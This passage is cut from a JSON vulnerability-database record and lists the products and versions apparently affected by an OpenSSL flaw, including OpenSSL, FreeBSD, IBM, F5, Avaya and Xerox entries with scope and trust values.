}, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8y" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8za" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8p" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8r" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8w" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8j" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "0.9.8 thats all 0.9.8zb" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.0 thats all 1.0.0n" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.1 thats all 1.0.1i" }, { "model": "hp virtual connect", "scope": "lt", "trust": 0.8, "vendor": "hewlett packard", "version": "8gb 24 port fiber channel module 3.00 (vc ( virtual connect ) 4.40 )" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7835" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1.1" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "workcentre r14-11 spar", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "5855072.060.134.32804" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "8.4-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip wom hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.3" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "10.0-beta", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7225" }, { "model": "upward integration modules scvmm add-in", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "-release-p2", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "virtual connect 8gb 24-port fc module", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "project openssl 0.9.8f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "alpha", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0" }, { "model": "tivoli netcool system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "9.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "8.4-release-p15", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.8" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "big-ip webaccelerator hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "project openssl 0.9.8u", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "one-x client enablement services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "8.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "5745061.132.224.35203" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "9.2-release-p11", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.470" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.0" }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "virtual connect 8gb 24-port fc module", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "tivoli netcool/reporter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "vios fp-25 sp-02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.4" }, { "model": "9.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.3-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.0" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "7.3-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.4-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip asm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6.2" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "7.1-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip edge gateway hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "idatplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79120" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "project openssl 0.9.8w", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "-release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "jboss web server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "2.1.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.1.0" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2407863" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1.0" }, { "model": "idatplex dx360 m4 water cooled type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79180" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x35007383" }, { "model": "project openssl 1.0.0m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1.2" }, { "model": "release-p4", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "5855" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "10.0-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "clustered data ontap antivirus connector", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "9.1-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "9303" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2207906" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "megaraid storage manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "15.03.01.00" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.9" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "hp-ux b.11.23 (11i", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "v2)" }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip webaccelerator hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "-release/alpha", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "8.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.1" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.0.3" }, { "model": "9.2-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5" }, { "model": "2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "9.1--releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.2" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "proventia network security controller 1.0.3352m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "idatplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79130" }, { "model": "6.3-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "9.3-beta3-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "-release-p20", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "-release-p8", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "9.0-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "-release-p14", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.40" }, { "model": "-stablepre2001-07-20", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "big-ip ltm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "8.3-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "6.3-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.0.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "9.2-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.0" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x33007382" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "7.2-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "virtual connect 8gb 24-port fc module", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0" }, { "model": "project openssl 0.9.8y", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "7.0-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "9.0-rc3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "upward integration modules for microsoft system center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "8700" }, { "model": "jboss enterprise application platform", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.3" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "workcentre r14-11 spar", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "5845072.060.134.32804" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "upward integration modules hardware management pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3850x638370" }, { "model": "-release-p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "big-ip ltm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "project openssl 1.0.0l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "upward integration modules integrated installer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "9.1-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "7.1-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "7.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.3" }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rc2", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "5740" }, { "model": "9.0-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system manager node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7955" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.2" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "nextscale nx360 m4 type", "scope": 